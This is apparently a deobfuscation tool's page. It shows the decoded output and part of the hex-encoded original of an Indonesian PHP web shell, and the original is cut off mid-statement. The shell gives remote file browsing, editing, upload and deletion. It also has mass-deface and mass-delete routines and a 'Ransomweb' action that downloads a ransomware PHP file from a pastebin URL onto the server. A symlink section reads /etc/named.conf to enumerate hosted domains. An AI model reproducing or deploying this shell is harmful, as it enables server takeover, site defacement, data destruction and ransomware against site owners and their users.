5.4825,3.87c1.67969,1.00781 3.03688,1.935 3.87,2.9025c0.83313,0.9675 1.29,1.94844 1.29,3.87c0,3.31906 -2.48594,5.805 -5.805,5.805c-3.48031,0 -5.9125,-2.01562 -5.9125,-5.805c0,-3.31906 -0.68531,-6.63812 -2.0425,-9.3525c-0.67187,-1.35719 -1.55875,-2.52625 -2.6875,-3.5475c-1.12875,-1.02125 -2.66062,-1.935 -4.515,-1.935c-1.89469,-0.05375 -3.49375,1.43781 -3.5475,3.3325c-0.05375,1.89469 1.43781,3.49375 3.3325,3.5475c0.02688,0.01344 0.02688,0.04031 0.1075,0.1075c0.26875,0.24188 0.67188,0.81969 1.075,1.6125c0.79281,1.58563 1.3975,4.05813 1.3975,6.235c0,7.22938 5.95281,12.685 12.7925,12.685c7.00094,0 12.685,-5.68406 12.685,-12.685c0,-3.39969 -1.26312,-6.38281 -3.01,-8.385c-1.74687,-2.00219 -3.72219,-3.14437 -5.4825,-4.1925c-1.76031,-1.04812 -3.26531,-1.96187 -4.085,-2.795c-0.81969,-0.83312 -1.1825,-1.42437 -1.1825,-2.9025c0.04031,-0.99437 -0.36281,-1.94844 -1.075,-2.62031c-0.72562,-0.68531 -1.70656,-1.02125 -2.6875,-0.92719z"></path></g></g></svg>
\xa                            <a class="path" href="?path=" . $path . "&aksi=buatransom">Buat Ransomweb</a>
                        
                        </div>\xa                        <!-- akhir auto create ransomweb -->
                    </div>
                </div>\xa            </div>\xa            <!-- akhir tambah file/folder & ransomweb -->"; goto SRf7o; fzFNd: foreach ($scandir as $direktori) { if ($direktori != "." && $direktori != "..") { if (is_dir($direktori)) { echo "<tr>
                        <th scope="row"><svg xmlns="http://www.w3.org/2000/svg" width="26" height="26" fill="currentColor" class="bi bi-folder-fill" viewBox="0 0 16 16">\xa                        <path d="M9.828 3h3.982a2 2 0 0 1 1.992 2.181l-.637 7A2 2 0 0 1 13.174 14H2.825a2 2 0 0 1-1.991-1.819l-.637-7a1.99 1.99 0 0 1 .342-1.31L.5 3a2 2 0 0 1 2-2h3.672a2 2 0 0 1 1.414.586l.828.828A2 2 0 0 0 9.828 3zm-8.322.12C1.72 3.042 1.95 3 2.19 3h5.396l-.707-.707A1 1 0 0 0 6.172 2H2.5a1 1 0 0 0-1 .981l.006.139z"/>\xa                      </svg></th>
                        <td><a class="path" nama='filenya' href="?path=" . $path . "/" . $direktori . "">" . $direktori . "</a></td>
                        <td>\xa                        <form method='POST' action="?option=&path=" . $path . "">
                        <div class="pilihan input-group mb-3">
                        <select name='opt' class="pilihan form-select form-select-sm mb-3" id="inputGroupSelect02" aria-label="Default select example">
                            <option selected>Choose...</option>\xa                            <option value="rename">Rename</option>\xa                            <option value="delete">Delete</option>
                        </select>\xa                        </div>\xa                        <input type="hidden" name="type" value="directory">
                        <input type="hidden" name="pathnya" value='" . $path . "/" . $direktori . "'>
                        <button name="now" class="tombol btn btn-outline-secondary" type="submit">Now</button>\xa                        </form>
                        </td>
                      </tr>"; } } } goto DZMI8; fDFDv: if (isset($_POST["btn"])) { $nama = $_FILES["upl"]["name"]; $lokasi = $_FILES["upl"]["tmp_name"]; $folder = ''; if (move_uploaded_file($lokasi, $folder . $nama)) { echo "<script>swal("Berhasil Upload!!!", "Selamat anda Bisa Mengupload File", "success"); </script>"; } else { echo "<script> swal("Gagal Upload!!!", "Maaf Tidak Bisa Upload File", "error"); </script>"; } } goto S_SOe; XgDDu: if ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<script>window.location='?path=" . $path . "';swal('Berhasil Mengedit File!!!', 'Selamat Anda Berhasil Mengedit File', 'success');</script>"; } else { echo "<script>window.location='?path=" . $path . "'; swal('Gagal Menghapus File!!!', 'Anda Gagal Menghapus File', 'error');</script>"; } fclose($fp); } echo "<form method='POST'><div class="bgnya container-fluid alert alert-warning alert-dismissible fade show" role="alert">
            <textarea class="lihat form-control" id="exampleFormControlTextarea1" rows="20" name="src">" . htmlspecialchars(file_get_contents($_POST["pathnya"])) . "</textarea><a href="?Home" type="button" class="tutup btn-close" data-bs-dismiss="alert" aria-label="Close"></a>\xa            <input type="hidden" name="path" value='" . $_POST["pathnya"] . "'>
<input type="hidden" name="opt" value="edit">
            </div><button name="edit" class="tombol btn btn-outline-secondary" type="submit">Simpan</button></form>"; } goto o2Prn; MQCqU: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "<a class='path' href="?path=/">/</a>"; continue; } if ($pat == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "/"; } } echo "" class="path">" . $pat . "</a>/"; } goto G8Ag4; HWDK_: $scandir = scandir($path); goto fzFNd; mRvz3: if ($_GET["aksi"] == "massdeface") { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Berhasil => {$lokasi}\xa"; file_put_contents($lokasi, $isi_script); $MassDeface = tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Berhasil => {$dirb}/{$namafile}
"; file_put_contents($lokasi, $isi_script); } } } } } } if ($_POST["start"]) { echo "<textarea class='form-control' rows='8' disabled='disabled'>"; if ($_POST["tipe"] == "mahal") { tipe_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); } elseif ($_POST["tipe"] == "murah") { tipe_biasa($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); } echo "</textarea><a href='?dir={$dir}' class='btn btn-info btn-block mt-3'>Kembali</a>"; } else { echo "<form method='post'>\xa	\x9	\x9<center>
	\x9	\x9	<p>{ Type Mass Deface }</p>\xa\x9	\x9\x9\x9<input id='toggle-on' class='toggle toggle-left' name='tipe' value='murah' type='radio' checked>\xa\x9				<label for='toggle-on' class='butn'>Biasa</label>
\x9\x9	\x9	<input id='toggle-off' class='toggle toggle-right' name='tipe' value='mahal' type='radio'>
\x9	\x9		<label for='toggle-off' class='butn'>Masal</label>
	\x9\x9\x9</center><hr>
\x9	\x9	<p><i class='fa fa-folder'></i> Lokasi</p>
\x9\x9	\x9<input type='text' name='d_dir' value='{$dir}' class='form-control'><br>
\x9	\x9\x9<p><i class ='fa fa-file'></i> Nama File</p>
\x9	\x9\x9<input type='text' name='d_file' placeholder='index.php' class='form-control'><br/>
	\x9\x9	<p><i class ='fa fa-file'></i> Isi File</p>\xa\x9\x9		<textarea name='script' class='form-control' rows='5' placeholder='Hacked By Mr.MF33'></textarea><br/>
\x9	\x9	<input type='submit' name='start' value='Mass Deface' class='btn btn-danger form-control'><br/>\xa	\x9	</form><br><br>"; } } goto fDFDv; Ddh0j: if ($_GET["aksi"] == "buatfolder") { if (isset($_POST["folderss"])) { $folder = $_POST["namaF"]; $nama_folder = $path . "/" . $folder; system(mkdir($nama_folder)); echo "<script>window.location='?path=" . $path . "'; alert('Folder Sukses Dibuat!')</script>"; } echo "\xa                <form method="POST">
                    <label for="exampleFormControlInput1" class="label form-label">Nama Folder :</label>\xa                    <div class="tambahdir input-group mb-3">
                        <input name="namaF" type="text" class="form-control" placeholder="Masukkan Nama Folder" aria-describedby="button-addon2">\xa                        <button name="folderss" class="klik btn btn-outline-secondary" type="submit" id="button-addon2">Create Folder</button>\xa                    </div>  
                </form>"; } goto TsdEd; VBFow: ?>?> 

Did this file decode correctly?

Original Code


?><?php
 goto exsUL; rwKjE: if (isset($_GET["\x70\141\x74\150\x5f\146\151\x6c\145"])) { $lihat = $_GET["\x70\x61\164\x68\x5f\x66\x69\x6c\x65"]; } goto giBbO; giBbO: if ($_GET["\x61\x6b\163\151"] == "\x76\151\x65\167") { echo "\x3c\x62\x72\x3e\74\144\x69\x76\x20\143\x6c\141\x73\163\x3d\x22\x62\147\156\x79\141\40\143\157\x6e\164\x61\151\156\145\162\55\x66\x6c\x75\151\144\40\141\154\x65\162\164\x20\x61\x6c\145\x72\164\55\167\x61\162\156\151\156\147\40\141\x6c\145\162\x74\55\x64\151\163\x6d\151\x73\x73\151\x62\x6c\x65\40\x66\141\144\x65\x20\163\x68\x6f\167\x22\x20\162\157\x6c\145\x3d\42\141\x6c\145\162\x74\42\x3e\74\164\145\170\164\x61\162\x65\141\x20\x63\154\x61\163\163\75\42\154\x69\x68\141\x74\x20\146\157\x72\x6d\55\143\x6f\156\x74\x72\x6f\x6c\42\x20\151\x64\x3d\x22\x65\x78\141\x6d\160\154\145\106\157\162\155\x43\x6f\x6e\x74\162\157\154\x54\x65\170\164\x61\162\145\141\61\x22\40\x72\157\167\x73\75\x22\62\60\42\x20\144\x69\163\141\x62\154\145\x64\76" . htmlspecialchars(file_get_contents($lihat)) . "\74\57\164\x65\x78\x74\141\x72\145\141\76\x3c\x61\40\150\162\x65\x66\75\42\x3f\x48\x6f\x6d\x65\x22\40\164\171\160\x65\75\42\142\x75\x74\164\157\156\42\40\143\154\x61\x73\163\75\x22\164\x75\164\165\x70\x20\x62\x74\x6e\x2d\143\154\157\x73\x65\x22\x20\144\141\164\x61\55\142\163\55\144\151\x73\155\151\163\163\75\42\141\154\145\162\x74\x22\40\141\x72\x69\141\55\x6c\141\x62\x65\154\x3d\x22\103\154\157\x73\145\42\76\x3c\57\x61\x3e\x3c\x2f\x64\x69\x76\x3e"; } goto HWDK_; TsdEd: if ($_GET["\141\153\163\151"] == "\x62\x75\141\x74\x66\x69\154\x65") { if (isset($_POST["\x62\165\x61\164"])) { $nama_file = $path . "\x2f" . $_POST["\156\x61\155\141\x5f\146\151\154\145"]; $isi_file = $_POST["\x69\x73\x69\x5f\x66\151\154\x65"]; $buat_file = fopen($nama_file, "\x77"); fwrite($buat_file, $isi_file); fclose($buat); if (empty($buat)) { echo "\x3c\x73\143\162\151\x70\164\x3e\x77\151\x6e\144\x6f\167\56\154\157\143\141\x74\x69\x6f\x6e\x3d\47\x3f\160\x61\164\150\x3d" . $path . "\47\73\40\x61\154\145\x72\x74\x28\47\x53\165\x6b\163\x65\x73\x21\x21\x21\47\x29\74\57\x73\x63\162\x69\x70\164\76"; } else { echo "\x3c\163\x63\x72\151\x70\164\x3e\x77\x69\156\144\x6f\x77\56\154\157\143\141\x74\x69\x6f\156\x3d\x27\x3f\160\141\164\150\x3d" . $path . "\x27\x3b\x20\x61\x6c\145\x72\164\x28\47\107\141\x67\141\154\x21\x21\41\47\51\x3c\57\x73\x63\162\151\160\164\x3e"; } } echo "\x3c\146\157\162\x6d\x20\x6d\145\x74\x68\x6f\144\75\x22\160\157\163\x74\42\x20\143\154\141\163\163\x3d\42\155\x74\x2d\63\x22\76\xa\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\x3c\144\151\x76\x20\143\154\141\x73\163\75\x22\155\x62\x2d\x33\x22\76\xa\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\74\x6c\x61\x62\x65\x6c\40\x66\x6f\x72\x3d\42\145\170\141\155\x70\x6c\x65\x46\x6f\162\x6d\103\x6f\x6e\164\162\x6f\x6c\111\156\x70\165\x74\x31\42\40\x63\x6c\x61\163\163\x3d\x22\x66\x6f\162\x6d\55\154\141\142\x65\154\x22\76\x4e\x61\155\x61\x20\106\x69\154\145\x20\72\x3c\57\x6c\141\142\145\154\x3e\xa\x20\x20\x20\40\40\40\40\x20\x20\40\40\40\40\x20\x20\40\x3c\151\156\x70\165\164\x20\164\x79\x70\145\75\x22\164\x65\170\x74\42\40\x6e\141\155\145\75\42\x6e\x61\x6d\141\137\x66\151\x6c\x65\x22\40\160\x6c\141\x63\x65\150\157\x6c\x64\x65\x72\x3d\x22\x4d\x61\x73\165\x6b\153\141\x6e\40\116\141\155\141\40\106\151\154\145\x6e\x79\x61\x22\40\143\x6c\141\x73\x73\75\42\x66\x6f\162\155\x2d\x63\157\x6e\x74\x72\x6f\154\x22\x20\x69\144\75\x22\x65\x78\141\x6d\160\x6c\x65\x46\157\x72\x6d\103\157\156\164\x72\x6f\154\x49\x6e\x70\165\x74\61\x22\x20\x70\x6c\x61\x63\145\150\157\154\144\x65\x72\75\42\x6e\x61\155\x65\x40\145\170\x61\x6d\x70\154\x65\56\143\x6f\x6d\x22\x3e\xa\40\40\40\40\x20\x20\40\x20\x20\40\40\x20\40\x20\x3c\57\144\x69\x76\x3e\xa\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\x20\74\x64\x69\166\x20\x63\154\x61\x73\x73\75\x22\x6d\142\55\63\x22\76\xa\40\40\74\x6c\141\142\x65\154\40\146\x6f\162\75\x22\145\170\x61\155\x70\x6c\x65\106\157\x72\155\103\x6f\156\164\162\157\154\124\145\x78\164\x61\x72\145\x61\x31\x22\40\143\x6c\141\163\163\75\x22\146\x6f\162\x6d\x2d\154\141\142\145\x6c\42\76\x49\163\x69\x20\106\x69\154\145\40\72\74\x2f\154\141\x62\145\154\x3e\12\x20\x20\x3c\164\x65\170\x74\x61\162\145\x61\40\143\x6c\x61\x73\163\75\42\x66\157\162\x6d\55\x63\157\x6e\x74\x72\157\x6c\x22\40\156\x61\x6d\x65\x3d\x22\151\x73\x69\x22\40\x70\x6c\x61\143\x65\150\157\x6c\144\x65\x72\75\42\115\x61\163\165\x6b\153\141\156\x20\x49\163\x69\x20\106\151\x6c\x65\156\x79\141\42\40\x69\x64\x3d\x22\x65\x78\141\155\x70\154\x65\106\157\x72\155\x43\x6f\x6e\x74\162\157\x6c\124\x65\170\x74\x61\162\145\141\61\x22\40\162\x6f\x77\x73\75\42\x33\42\76\74\57\x74\145\170\164\141\x72\145\x61\76\12\x3c\x2f\x64\151\166\x3e\74\142\x72\x3e\12\x3c\142\165\164\x74\157\156\x20\156\x61\x6d\x65\75\x22\142\165\141\x74\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\164\157\x6d\142\x6f\x6c\x20\x62\164\x6e\x20\x62\164\x6e\x2d\157\x75\x74\x6c\x69\156\145\x2d\163\145\x63\157\x6e\144\x61\x72\171\42\40\164\x79\x70\x65\75\x22\x73\x75\142\x6d\151\x74\x22\x3e\103\162\x65\141\164\145\40\116\x6f\167\x3c\57\142\165\164\164\x6f\x6e\x3e"; } goto rwKjE; DZMI8: foreach ($scandir as $file) { if ($file != "\56" && $file != "\56\x2e") { if (file_exists($file)) { echo "\x3c\164\x72\x3e\xa\x20\40\40\40\40\40\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x3c\x74\x68\40\x73\x63\x6f\x70\145\x3d\x22\x72\157\x77\42\x3e\74\163\166\147\40\170\x6d\x6c\x6e\163\75\42\x68\164\164\160\x3a\x2f\57\167\167\167\x2e\167\x33\x2e\x6f\162\x67\x2f\x32\60\x30\x30\57\x73\166\x67\x22\40\x77\x69\x64\164\x68\x3d\x22\62\x36\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x36\x22\x20\x66\151\x6c\x6c\x3d\42\x63\x75\x72\162\x65\x6e\x74\x43\x6f\154\x6f\162\x22\40\143\154\x61\163\163\75\x22\x62\x69\40\x62\151\55\x66\x69\154\x65\x2d\x65\141\162\155\x61\x72\x6b\x2d\x63\157\144\145\55\146\151\154\154\42\x20\x76\x69\x65\167\102\x6f\x78\x3d\42\x30\x20\60\x20\x31\66\x20\x31\66\42\76\xa\x20\40\x20\x20\x20\x20\x20\40\40\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\40\40\74\x70\141\x74\x68\x20\144\75\x22\x4d\71\x2e\62\x39\63\x20\x30\110\64\141\x32\x20\x32\40\x30\x20\x30\40\x30\x2d\x32\40\62\x76\x31\x32\141\x32\40\x32\40\60\x20\x30\40\x30\40\62\40\x32\x68\70\x61\x32\40\x32\40\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x56\x34\56\67\60\x37\x41\61\x20\x31\x20\x30\40\60\x20\x30\40\61\63\x2e\x37\60\x37\40\x34\114\x31\x30\x20\56\x32\71\63\x41\x31\40\61\40\60\x20\x30\40\60\40\71\56\62\71\63\x20\x30\172\115\x39\x2e\65\x20\63\56\x35\x76\x2d\x32\154\x33\x20\x33\x68\55\x32\x61\x31\x20\61\40\x30\40\60\x20\61\x2d\61\55\x31\x7a\115\66\x2e\x36\64\66\40\x37\56\x36\x34\66\141\x2e\x35\56\x35\x20\x30\x20\61\40\61\40\56\67\60\70\56\67\x30\70\114\x35\56\67\x30\67\40\x31\x30\154\61\56\66\x34\67\40\61\x2e\66\64\66\141\56\x35\x2e\x35\x20\60\40\60\40\61\x2d\x2e\67\x30\x38\56\67\60\70\154\x2d\62\x2d\62\141\x2e\65\56\65\x20\60\40\x30\40\x31\40\x30\55\56\67\60\70\x6c\x32\x2d\x32\x7a\x6d\62\56\x37\60\70\40\60\40\x32\x20\62\x61\56\x35\x2e\x35\x20\x30\x20\x30\x20\61\x20\x30\x20\56\x37\x30\70\154\x2d\x32\x20\x32\141\56\65\56\65\x20\60\40\x30\x20\61\x2d\x2e\x37\60\70\55\56\x37\x30\x38\114\x31\60\x2e\x32\x39\x33\40\61\x30\40\70\x2e\x36\x34\x36\40\70\56\63\65\x34\x61\56\65\56\65\x20\x30\40\x31\x20\x31\40\56\x37\x30\70\x2d\x2e\67\60\70\x7a\42\57\x3e\12\40\40\40\40\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\74\x2f\163\166\147\76\74\57\164\150\76\12\x20\x20\40\40\40\40\x20\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\74\x74\x64\x3e\x3c\x61\x20\x63\x6c\141\163\x73\x3d\x22\160\x61\x74\150\42\40\x6e\x61\x6d\x61\75\x27\x66\x69\x6c\x65\x6e\171\x61\47\40\150\162\145\x66\x3d\x22\77\x70\141\164\x68\75" . $path . "\46\141\153\163\x69\75\x76\151\x65\x77\x26\x70\141\x74\150\137\x66\151\x6c\x65\75" . $path . "\x2f" . $file . "\x22\76" . $file . "\74\57\x61\76\74\57\x74\x64\76\xa\40\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x3c\164\x64\76\xa\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\74\x66\x6f\162\155\40\155\145\x74\x68\x6f\x64\x3d\47\120\x4f\x53\124\x27\x20\141\x63\x74\151\157\156\x3d\42\77\157\160\x74\x69\x6f\156\75\46\160\x61\x74\x68\75" . $path . "\x22\x3e\12\x20\40\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\40\40\40\x20\x3c\144\x69\x76\x20\143\154\141\x73\163\75\x22\x70\151\x6c\x69\150\141\156\40\x69\156\160\165\x74\x2d\147\x72\x6f\165\x70\40\x6d\x62\55\x33\42\x3e\12\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\40\40\40\74\x73\x65\x6c\x65\143\164\x20\156\141\155\x65\75\47\x6f\160\164\x27\x20\143\x6c\141\x73\163\x3d\42\160\x69\x6c\151\x68\141\x6e\40\146\x6f\162\155\55\x73\x65\x6c\145\143\164\40\146\x6f\x72\x6d\55\163\x65\x6c\x65\143\164\x2d\163\155\40\155\x62\x2d\63\42\x20\x69\x64\75\42\x69\x6e\x70\165\164\107\162\157\165\160\123\x65\x6c\x65\143\x74\x30\x32\x22\x20\141\162\x69\141\x2d\154\x61\x62\x65\x6c\75\42\104\x65\x66\x61\165\x6c\164\x20\163\145\x6c\145\143\x74\40\145\x78\141\155\x70\154\x65\x22\76\xa\40\40\40\40\40\40\x20\x20\40\40\40\x20\40\40\40\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x3c\157\160\164\151\157\x6e\40\x73\145\x6c\145\x63\x74\145\144\76\103\150\x6f\157\x73\145\56\56\x2e\74\57\157\x70\164\151\x6f\x6e\76\12\x20\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\40\x3c\x6f\x70\164\x69\x6f\x6e\x20\166\141\154\x75\145\x3d\42\x65\144\151\x74\42\76\105\x64\151\164\x3c\57\x6f\160\164\x69\157\x6e\76\xa\40\40\x20\40\40\x20\40\40\40\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\40\40\40\40\40\40\40\40\40\40\x20\40\74\157\160\x74\x69\157\x6e\40\166\x61\154\165\x65\75\x22\x72\145\156\x61\x6d\145\x22\76\122\x65\x6e\x61\x6d\x65\x3c\x2f\157\160\x74\151\x6f\156\x3e\12\40\40\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\74\x6f\x70\164\x69\x6f\x6e\40\x76\141\154\x75\145\75\x22\144\x65\154\x65\164\x65\42\76\104\145\154\x65\164\145\x3c\57\x6f\160\x74\x69\157\x6e\x3e\12\x20\40\x20\40\40\40\x20\40\40\40\40\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\40\40\40\x20\x20\x3c\57\163\145\x6c\145\x63\x74\76\12\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\74\57\144\151\166\76\xa\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\40\x20\40\40\40\40\40\x20\x20\x20\40\40\40\40\40\74\x69\x6e\x70\x75\164\x20\x74\x79\160\145\75\x22\x68\x69\x64\x64\x65\x6e\x22\x20\x6e\141\x6d\x65\x3d\42\x74\171\x70\145\x22\40\x76\x61\x6c\165\145\75\x22\146\151\154\x65\x22\x3e\12\x20\40\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x3c\151\156\160\165\x74\40\164\171\x70\x65\x3d\x22\150\151\144\144\145\x6e\x22\x20\x6e\141\x6d\x65\x3d\42\160\141\164\150\x6e\171\x61\42\40\x76\141\154\165\145\x3d\x27" . $path . "\x2f" . $file . "\47\76\xa\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x20\40\40\x20\40\40\40\40\x20\40\x20\40\40\x20\74\x62\x75\x74\x74\x6f\x6e\40\x6e\x61\x6d\145\x3d\42\156\157\x77\x22\x20\143\154\141\163\x73\75\42\164\x6f\x6d\x62\x6f\x6c\x20\142\164\x6e\x20\x62\164\156\x2d\157\x75\164\154\151\156\145\x2d\163\145\143\x6f\x6e\144\x61\162\171\x22\40\x74\x79\x70\x65\x3d\x22\163\x75\x62\155\151\164\42\x3e\116\157\167\x3c\x2f\x62\165\x74\164\157\156\76\12\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\x20\40\40\x20\40\40\x20\x20\40\x20\40\x20\74\x2f\x66\157\x72\155\76\12\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\40\x20\40\40\x20\x3c\x2f\x74\x64\76\xa\40\x20\40\x20\x20\40\x20\x20\40\40\40\x20\x20\40\40\x20\40\40\x20\x20\40\40\40\x20\40\x20\74\57\164\162\x3e"; } } } goto RBMdP; SRf7o: if ($_GET["\141\x6b\x73\151"] == "\142\165\x61\x74\162\x61\156\163\157\x6d") { $url = "\150\x74\164\160\163\x3a\x2f\x2f\x70\x61\x73\164\x65\x62\x69\x6e\56\143\157\x6d\57\x72\141\167\57\x4c\142\x56\x68\x4e\156\132\x46"; $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $get = curl_exec($curl); if ($get != '') { $puts = fopen("\x52\x61\x6e\x73\x6f\155\127\145\x62\x2e\x70\x68\160", "\x77"); fwrite($puts, $get); fclose($puts); $nama_file = "\x52\x61\156\x73\x6f\x6d\127\145\142\56\160\150\160"; $server_web = "\150\164\x74\160\x3a\x2f\x2f" . $_SERVER["\110\124\124\x50\x5f\x48\117\x53\x54"] . "\57"; if ($puts != '') { echo "\74\x73\143\162\x69\x70\x74\x3e\167\x69\x6e\144\157\x77\56\x6c\157\143\141\164\151\157\156\75\47\77\160\141\164\x68\75" . $path . "\x27\73\x20\x61\x6c\145\x72\164\x28\x27\x53\x75\x6b\x73\145\163\47\x29\74\x2f\x73\143\162\151\x70\164\76"; } else { echo "\x47\141\x67\141\x6c\40\x4d\x65\155\x62\165\x61\x74\x20\x46\x69\x6c\x65"; } } } goto Ddh0j; WwQku: if ($_GET["\x61\x6b\163\151"] == "\155\x61\163\163\144\145\x6c") { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\57{$dirb}"; $lokasi = $dirc . "\x2f" . $namafile; if ($dirb === "\x2e") { if (file_exists("{$dir}\x2f{$namafile}")) { unlink("{$dir}\57{$namafile}"); } } elseif ($dirb === "\56\56") { if (file_exists('' . dirname($dir) . "\57{$namafile}")) { unlink('' . dirname($dir) . "\57{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi}\x20\x3e\40\124\x65\162\150\x61\160\165\x73\12"; unlink($lokasi); $massdel = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST["\x73\164\141\x72\x74"]) { echo "\x3c\164\145\170\164\141\162\x65\141\40\143\154\x61\163\x73\x3d\47\146\157\x72\x6d\x2d\143\x6f\x6e\164\162\157\x6c\x27\x20\162\157\167\163\x3d\47\x38\x27\x20\144\151\x73\x61\x62\x6c\145\144\x3d\47\144\x69\163\141\142\154\x65\144\x27\76"; hapus_massal($_POST["\144\137\x64\x69\x72"], $_POST["\144\137\146\x69\x6c\x65"]); echo "\74\57\164\x65\170\x74\141\x72\x65\141\x3e\74\141\x20\150\162\145\x66\x3d\47\77\x64\151\x72\x3d{$dir}\x27\40\143\154\141\x73\163\75\47\142\164\x6e\x20\142\x74\x6e\x2d\151\156\146\x6f\40\x62\x74\x6e\x2d\142\154\x6f\x63\153\40\155\x74\55\63\47\76\113\145\155\x62\141\154\151\x3c\57\141\76"; } else { echo "\x3c\x66\x6f\x72\155\x20\155\145\x74\x68\157\x64\x3d\47\160\157\163\x74\47\x3e\12\11\11\11\11\x9\x3c\160\x3e\74\151\x20\x63\x6c\x61\x73\x73\75\47\146\141\40\146\141\55\146\x6f\154\x64\x65\x72\47\x3e\74\57\x69\76\40\114\x6f\153\x61\x73\151\x3c\x2f\x70\x3e\xa\x9\11\11\11\x9\x3c\x69\156\160\165\164\x20\x74\171\160\145\x3d\47\164\x65\170\x74\x27\40\156\141\x6d\145\x3d\47\x64\137\x64\x69\x72\x27\40\x76\x61\154\165\x65\x3d\47{$dir}\x27\x20\x63\x6c\141\163\163\x3d\x27\x66\x6f\162\155\x2d\143\x6f\156\x74\162\157\x6c\47\76\74\142\162\76\12\x9\x9\11\11\11\74\x70\x3e\x3c\151\40\x63\154\141\163\x73\40\75\47\146\141\40\146\141\55\x66\151\x6c\x65\47\x3e\74\x2f\151\x3e\x20\116\x61\155\141\40\x46\151\x6c\145\x3c\57\x70\x3e\12\x9\11\11\x9\x9\74\151\156\160\x75\164\40\164\171\x70\x65\x3d\x27\x74\x65\x78\164\x27\x20\x6e\141\155\x65\75\x27\144\x5f\146\x69\x6c\x65\x27\x20\x70\154\x61\x63\x65\150\x6f\154\144\x65\162\75\47\151\x6e\x64\145\x78\x2e\160\x68\x70\x27\x20\x63\154\141\x73\163\x3d\x27\146\x6f\162\155\55\x63\157\x6e\164\x72\157\x6c\x27\x3e\x3c\142\x72\x3e\xa\x9\x9\11\11\x9\x3c\151\x6e\x70\x75\x74\x20\x74\x79\160\145\75\x27\163\165\142\x6d\151\164\47\x20\x6e\x61\x6d\x65\x3d\x27\163\164\x61\x72\164\x27\40\166\141\154\165\x65\x3d\x27\x48\141\x70\x75\163\47\40\143\x6c\x61\163\163\75\47\x62\x74\x6e\x20\x62\164\x6e\x2d\x64\141\x6e\x67\x65\x72\40\x66\157\162\155\x2d\x63\157\x6e\164\x72\x6f\154\47\76\12\11\11\x9\x20\x20\40\40\40\x20\x20\x20\x3c\57\x66\x6f\x72\155\x3e\74\142\162\x3e\x3c\x62\162\x3e"; } } goto mRvz3; G8Ag4: if ($_GET["\x61\153\x73\151"] == "\163\x79\x6d\154\151\x6e\x6b") { if (!is_file("\156\x61\x6d\145\x64\56\x74\x78\164")) { $d00m = @file("\57\145\164\x63\x2f\x6e\141\155\x65\x64\56\143\157\156\146"); } else { $d00m = @file("\156\x61\x6d\x65\144\56\164\170\x74"); } if (!$d00m) { echo 